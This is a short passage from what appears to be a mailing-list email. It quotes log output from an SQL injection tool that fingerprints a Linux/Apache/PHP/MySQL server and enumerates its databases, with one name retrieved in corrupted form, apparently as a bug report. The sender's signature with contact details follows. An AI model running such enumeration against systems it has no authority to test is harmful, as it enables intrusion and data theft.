parameter > [13:31:05] [INFO] the back-end DBMS is MySQL > web server operating system: Linux Fedora 5 (Bordeaux) > web application technology: Apache 2.2.0, PHP 5.2.1 > back-end DBMS: MySQL 5 > > [13:31:05] [INFO] fetching database names > [13:31:05] [INFO] fetching number of databases > [13:31:05] [INFO] retrieved: 21 > [13:33:01] [INFO] retrieved: informa`ion_schema > > Thanks -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |